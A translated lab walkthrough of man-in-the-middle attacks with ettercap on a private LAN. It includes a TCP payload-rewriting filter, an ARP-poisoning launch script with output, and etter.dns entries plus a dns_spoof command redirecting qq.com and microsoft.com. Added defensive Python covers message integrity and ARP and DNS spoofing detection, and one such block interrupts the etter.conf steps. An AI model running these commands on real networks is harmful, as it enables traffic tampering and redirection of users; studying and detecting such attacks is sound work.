System environment
NAME="Ubuntu"
VERSION="20.04.5 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.5 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Install ettercap
sudo apt-get update
sudo apt-get -y install ettercap-common
Lab environment
All three machines are on the same LAN.
Server A:
# ip: 192.168.63.199
sudo nc -l 8080
Server B:
# ip: 192.168.63.147
sudo nc 192.168.63.199 8080
Attacker machine:
# ip: 192.168.63.69
Function tests
TCP command tampering
Write the filter: test_dns.filter
if (ip.proto == TCP) {
    msg("TCP DATA");
    if (tcp.src == 8080 || tcp.dst == 8080) {
        msg("TCP 8080");
        log(DECODED.data, "./decrypted_log");
        if (search(DECODED.data, "1")) {
            DATA.data = "999";
        }
    }
}
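The filter above works because the nc session carries plain, unauthenticated bytes: an on-path host can rewrite any port-8080 payload that contains "1" and neither endpoint notices. As an added example (not code from the original post), the following Python shows the minimal application-layer integrity check that makes such a rewrite detectable: the sender appends an HMAC-SHA256 tag, and the receiver refuses any payload whose tag no longer verifies. The shared key, the message, and the filter_rewrite stand-in that mimics the filter's DATA.data = "999" replacement are all constructed for illustration; in practice the fix is a TLS or SSH channel rather than a hand-rolled tag, but the principle is the same.

```python
import hashlib
import hmac
from typing import Optional, Tuple

# Constructed shared key for the example only; a real deployment provisions it
# out of band (or uses TLS/SSH instead of a raw nc pipe).
SHARED_KEY = b"example-shared-key-not-for-production"
TAG_LEN = 32  # SHA-256 digest length in bytes


def seal(key: bytes, payload: bytes) -> bytes:
    """Return payload || HMAC-SHA256(key, payload)."""
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return payload + tag


def open_sealed(key: bytes, wire: bytes) -> Optional[bytes]:
    """Verify the trailing tag; return the payload, or None if it was altered."""
    if len(wire) < TAG_LEN:
        return None
    payload, tag = wire[:-TAG_LEN], wire[-TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # compare_digest avoids leaking the mismatch position through timing
    if not hmac.compare_digest(tag, expected):
        return None
    return payload


def filter_rewrite(wire: bytes) -> bytes:
    """Constructed stand-in for the page's etterfilter rule: when the TCP
    payload contains "1", the whole payload becomes "999" (DATA.data = "999")."""
    return b"999" if b"1" in wire else wire


def demo() -> Tuple[Optional[bytes], Optional[bytes]]:
    """Deliver one sealed message twice: once untouched, once through the filter."""
    wire = seal(SHARED_KEY, b"transfer 1 unit")
    untouched = open_sealed(SHARED_KEY, wire)
    tampered = open_sealed(SHARED_KEY, filter_rewrite(wire))
    return untouched, tampered


if __name__ == "__main__":
    ok, bad = demo()
    print("untouched:", ok)      # the original payload
    print("tampered:", bad)      # None: rejected by the receiver
```

The receiver rejects the rewritten message either because it is now shorter than a tag, or, for a rewrite that keeps the length, because the tag was computed over different bytes. The filter's log(DECODED.data, ...) call would still capture the cleartext, so integrity alone does not give confidentiality; that is why an encrypted and authenticated transport is the real answer.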
Write the launch script: e_tcp.sh
#!/bin/sh
echo "TCP劫持检测"
echo "重新编译过滤器"
sudo rm -rf dns.ef
sudo etterfilter test_dns.filter -o dns.ef
echo "启动arp欺骗"
ettercap -Tq -i wlp1s0 -M ARP:remote -F dns.ef -w tcp8080.pcap /192.168.63.199// /192.168.63.147//
Run it
sudo ./e_tcp.sh
Output on success
启动arp欺骗
ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team
Content filters loaded from dns.ef...
Listening on:
wlp1s0 -> 00:21:5D:2D:2D:55
192.168.63.232/255.255.255.0
fe80::8ca3:6ca9:3650:cb33/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/all/use_tempaddr is not set to 0.
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/wlp1s0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...
34 plugins
42 protocol dissectors
57 ports monitored
24609 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.63.199 92:D5:E6:B6:A0:A2
GROUP 2 : 192.168.63.147 EA:56:E0:23:CE:CD
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080
Data transfer diagram
DNS tampering
Edit the configuration files
sudo vim /etc/ettercap/etter.conf and set uid and gid to 0
# contents as follows
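The ettercap output above lists the two poisoning victims; on each of them, the neighbour-table entry for the other host flips to the attacker's interface MAC (the wlp1s0 address in the banner), which is exactly what a LAN host can watch for. As an added example (not from the original post), the following Python monitor runs over a constructed sequence of ARP observations of the kind that polling `ip neigh` or a passive ARP capture would yield: it learns a baseline MAC per IP, flags any IP whose MAC changes, and flags a MAC that is bound to more than one IP at once. The IP and MAC values are the page's lab addresses; the timestamps and the order of events are constructed.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple


class ArpObservation(NamedTuple):
    ts: int   # seconds since the monitor started (constructed)
    ip: str
    mac: str


# Constructed observations as seen from a host on the lab LAN. The victim MACs
# are the ones ettercap printed; 00:21:5d:2d:2d:55 is the attacker's wlp1s0.
OBSERVATIONS = [
    ArpObservation(0, "192.168.63.199", "92:D5:E6:B6:A0:A2"),
    ArpObservation(0, "192.168.63.147", "EA:56:E0:23:CE:CD"),
    ArpObservation(5, "192.168.63.199", "92:D5:E6:B6:A0:A2"),
    # ARP:remote poisoning starts: both victims are now "at" the attacker's MAC
    ArpObservation(12, "192.168.63.199", "00:21:5D:2D:2D:55"),
    ArpObservation(12, "192.168.63.147", "00:21:5D:2D:2D:55"),
]


def detect_arp_spoofing(observations: List[ArpObservation]) -> List[str]:
    """Return alert strings for two ARP-poisoning symptoms:
    1. an IP whose MAC differs from the first MAC learned for it;
    2. a MAC that is currently bound to more than one IP.
    """
    alerts: List[str] = []
    baseline: Dict[str, str] = {}   # ip -> first MAC learned
    current: Dict[str, str] = {}    # ip -> latest MAC seen
    for obs in observations:
        mac = obs.mac.lower()
        if obs.ip not in baseline:
            baseline[obs.ip] = mac
        elif baseline[obs.ip] != mac:
            alerts.append(
                f"t={obs.ts}: {obs.ip} changed from {baseline[obs.ip]} to {mac}")
        current[obs.ip] = mac
        # Reverse the latest bindings and check whether this MAC now answers
        # for several IPs, which is how a poisoner looks from the victim side.
        claims: Dict[str, List[str]] = defaultdict(list)
        for ip, m in current.items():
            claims[m].append(ip)
        ips = sorted(claims[mac])
        if len(ips) > 1:
            alerts.append(f"t={obs.ts}: {mac} claims {len(ips)} IPs: {', '.join(ips)}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(OBSERVATIONS):
        print(line)
```

A MAC change on its own can be benign (a DHCP lease moving to a new device, a NIC replacement), so the second symptom is the stronger signal: one MAC simultaneously claiming the gateway and a client is what ARP:remote produces. Static ARP entries for the gateway, Dynamic ARP Inspection on managed switches, and tools such as arpwatch implement the same checks at scale.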
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
sudo vim /etc/ettercap/etter.dns and edit the redirect entries (redirect target site ip: 180.101.50.242)
# redirect it to www.linux.org
#
qq.com A 180.101.50.242
microsoft.com A 107.170.40.56 1800
*.microsoft.com A 107.170.40.56 3600
www.microsoft.com PTR 107.170.40.56 # Wildcards in PTR are not allowed
#*.com A 180.101.50.242
Launch the attack (if no IP is specified, the whole LAN is targeted)
sudo ettercap -i wlp1s0 -Tq -P dns_spoof -M arp:remote /192.168.63.199// /192.168.63.1//
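The etter.dns entries above give two detectable fingerprints: a name whose answer disagrees with what a resolver outside the poisoned LAN returns, and, for wildcard rules such as the commented-out `*.com` line, many unrelated domains collapsing onto one IP. As an added example (not from the original post), the following Python applies both checks to constructed answer sets. The spoofed addresses are the ones from the page's etter.dns; every other address and the reference resolver's answers are made up (documentation-range IPs, not real DNS data), and a real tool would obtain the reference answers over DoT/DoH to a resolver the poisoner cannot sit in front of.

```python
from collections import defaultdict
from typing import Dict, List, Set

# Constructed A-record answers as a client on the lab LAN sees them while
# dns_spoof is active. 180.101.50.242 and 107.170.40.56 are the page's targets.
LAN_ANSWERS: Dict[str, Set[str]] = {
    "qq.com": {"180.101.50.242"},
    "www.microsoft.com": {"107.170.40.56"},
    "login.microsoft.com": {"107.170.40.56"},
    "shop.example.net": {"180.101.50.242"},   # constructed wildcard victim
    "example.com": {"203.0.113.10"},          # constructed, not spoofed
}

# Constructed answers from a trusted out-of-band resolver. Not real DNS data.
REFERENCE_ANSWERS: Dict[str, Set[str]] = {
    "qq.com": {"203.0.113.20", "203.0.113.21"},
    "www.microsoft.com": {"203.0.113.30"},
    "login.microsoft.com": {"203.0.113.31"},
    "shop.example.net": {"203.0.113.40"},
    "example.com": {"203.0.113.10"},
}


def find_spoofed_answers(lan: Dict[str, Set[str]],
                         reference: Dict[str, Set[str]]) -> List[str]:
    """Names whose LAN answer shares no address with the reference answer.
    Intersection rather than equality tolerates CDN round-robin, where two
    honest resolvers legitimately return different subsets of one pool."""
    suspicious = []
    for name, lan_ips in lan.items():
        ref_ips = reference.get(name)
        if ref_ips is not None and not (lan_ips & ref_ips):
            suspicious.append(name)
    return sorted(suspicious)


def registrable_domain(name: str) -> str:
    """Naive 'last two labels' approximation; a real tool would consult the
    Public Suffix List so that e.g. co.uk is handled correctly."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def find_answer_collapse(lan: Dict[str, Set[str]],
                         min_domains: int = 2) -> Dict[str, List[str]]:
    """IPs that answer for several unrelated registrable domains, the pattern
    a wildcard entry such as '*.com A 180.101.50.242' produces."""
    domains_by_ip: Dict[str, Set[str]] = defaultdict(set)
    for name, ips in lan.items():
        for ip in ips:
            domains_by_ip[ip].add(registrable_domain(name))
    return {ip: sorted(doms) for ip, doms in domains_by_ip.items()
            if len(doms) >= min_domains}


if __name__ == "__main__":
    print("answers disagreeing with the reference resolver:",
          find_spoofed_answers(LAN_ANSWERS, REFERENCE_ANSWERS))
    print("IPs answering for unrelated domains:",
          find_answer_collapse(LAN_ANSWERS))
```

The first check needs a reference path that does not traverse the poisoned gateway, so it belongs on a monitoring host with its own encrypted resolver connection; the second check works from the LAN side alone but only fires for wildcard-style rules. Both checks are signals to investigate rather than proof on their own, since legitimate shared hosting also puts many domains behind one address.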